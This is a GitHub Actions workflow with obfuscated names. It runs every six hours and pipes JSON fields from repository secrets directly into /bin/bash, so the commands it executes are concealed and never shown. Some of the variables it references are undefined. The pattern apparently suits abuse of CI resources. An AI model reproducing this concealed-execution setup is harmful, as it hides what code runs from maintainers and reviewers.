name: yangxiaosan3728
on:
  workflow_dispatch:
  schedule:
    - cron: '38 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangxiaosan3728
        env:
          agyxw32: ${{ secrets.agyxw32 }}
        run: |
          echo $agyxw32 | jq -r .umre3 | /bin/bash
          echo $clst4545 | jq -r .erbzv7 | /bin/bash
          echo $zbcm03 | jq -r .md09 | /bin/bash
          echo $h4197 | jq -r .tit07890 | /bin/bash

